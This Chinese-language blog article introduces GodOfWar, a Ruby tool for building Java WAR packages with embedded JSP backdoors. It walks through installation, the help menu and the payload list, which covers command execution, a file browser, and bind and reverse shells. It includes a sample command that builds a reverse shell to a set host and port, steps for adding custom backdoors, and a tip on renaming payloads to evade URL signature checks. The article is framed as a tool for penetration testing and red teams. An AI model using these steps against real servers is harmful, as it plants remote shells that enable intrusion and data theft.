GodOfWar:可嵌入恶意Payload的JavaWAR构建工具
今天给大家介绍的是一款名叫GodOfWar的开源Java WAR构建工具,在该工具的帮助下,研究人员可以轻松向Java WAR包中嵌入恶意Payload。
GodOfWar采用Ruby开发,是一款专用于生成恶意WAR Payload的命令行工具,该工具仅限于渗透测试或红队研究使用。
功能介绍
1、 已嵌入的Payload(尝试命令-l/–list)
-cmd_get -filebrowser -bind_shell -reverse_shell -reverse_shell_ui
2、可配置的后门(尝试命令–host/–port)
3、Payload名称控制
-修改恶意Payload名称,绕过URL签名验证机制
工具安装
$ gem install godofwar
工具使用
$godofwar -h
Helpmenu:
-p, --payload PAYLOAD 利用已有Payload生成恶意WAR文件
(check-l/--list)
-H, --host IP_ADDR 设置指定Payload的本地或远程IP地址
(used with -p/--payload)
-P, --port PORT 设置指定Payload的本地或远程端口号
(usedwith -p/--payload)
-o, --output [FILE] 输出文件并设置开发名称
(default isthe payload original name. check '-l/--list')
-l, --list 枚举所有可用的Payload
-h, --help 显示帮助信息
使用样例
枚举所有Payload:
$godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description:Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remotefile browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCPbind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444,"false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -pjava/jsp_shell_bind_tcp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCPreverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker","port"=>4444, "false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── Description: TCPreverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker","port"=>4444, "false"=>"No Settingsrequired!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
生成Payload并配置LHOST和LPORT:
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
开发完成之后,你可以进入( http://host:8080/puppy/puppy.jsp )来访问你的shell。
添加额外后门支持
1、 在payloads目录下创建一个新的文件夹。
2、 把自己开发的jsp文件存放到这个文件夹中。
3、 更新payloads_info.json文件中的下列参数:
-文件描述 -支持的操作系统(尽量覆盖所有操作系统) -配置信息:默认主机和端口号 -引用:Payload的原始创建者信息
项目地址
GodOfWar:【 GitHub传送门 】
许可证协议
本项目遵循 MIT开源许可证协议 。
* 参考来源: godofwar ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
正文到此结束
热门推荐
相关文章
近期评论
-
文章和留言都翻到11页了 没有OOM
-
-
朋友,翻页到11页,及以后,会出现OOM,无法访问
-
-
搞个gitee的项目
-
-
版本号是多少,你可以下载哪个代码仓库,jdk选1.8 直接跑就行
-
-
-
Loading...
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
